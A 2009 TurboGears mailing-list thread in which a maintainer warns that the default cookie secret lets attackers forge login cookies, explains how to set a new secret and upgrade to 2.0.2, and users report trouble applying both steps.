Hi All, The easy_install ... TurboGears2 update did not work for me also, I need to specify the tar.gz manually also. With regards to adding the cookie_secret, I was only able to do it in app_cfg.py as I can not make it work using the .ini file
Regards, Dax On Aug 16, 7:47 am, [email protected] wrote: > hi mark, that's important improvement. > > On Wed, Aug 12, 2009 at 04:16, Mark Ramm<[email protected]> wrote: > > We recently discovered that TurboGears2 ships with quickstart configuration > > that leaves users of it's default user authorization/authentication scheme > > vulnerable to a serious security issue. > > If you are running a TG2 application in production you are strongly > > encouraged to set the cookie salt for the authorization cookie in repoze.who > > to something other than it's default value. > > This is simple enough to do, just set base_config.sa_auth.cookie_secret to > > any secret value you'd like. For example: > > base_config.sa_auth.cookie_secret = "mynewsecret" > > You can also set it in development.ini using a key like: > > sa_auth.cookie_secret = "mysupersecret" > > it's a matter of my misunderstanding of the ini formats, but i failed to set > this in my roughly default development.ini. > > any idea is welcome. > > > Failure to do this could leave you vulnerable to someone who knows the > > default cookie secret being able to craft a cookie that allows a user into > > your site without authenticating through the normal mechanism. > > TurboGears 2.0.2 will enforce setting the cookie secret and will refuse to > > run if you have not set that value in your configuration. > > We've just released 2.0.2, which also fixes another security issue which could cause controller methods decorated with something other tha...@expose to still be exposed through the url dispatch mechanism. > > You can update to 2.0.2 with > > easy_install -Uihttp://turbogears.org/2.0/downloads/current/turbogears2 > > well, this wouldn't work for me too, and i had to specify the tar.gz name > manually. > > > > > > > -- > > Mark Ramm-Christensen > > email: mark at compoundthinking dot com > > blog:www.compoundthinking.com/blog > > > > > -- > alex > > smime.p7s > < 1KViewDownload --~--~---------~--~----~------------~-------~--~----~ You received this message because you are subscribed to the Google Groups "TurboGears" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [email protected] For more options, visit this group at http://groups.google.com/group/turbogears?hl=en -~----------~----~----~----~------~----~------~--~---
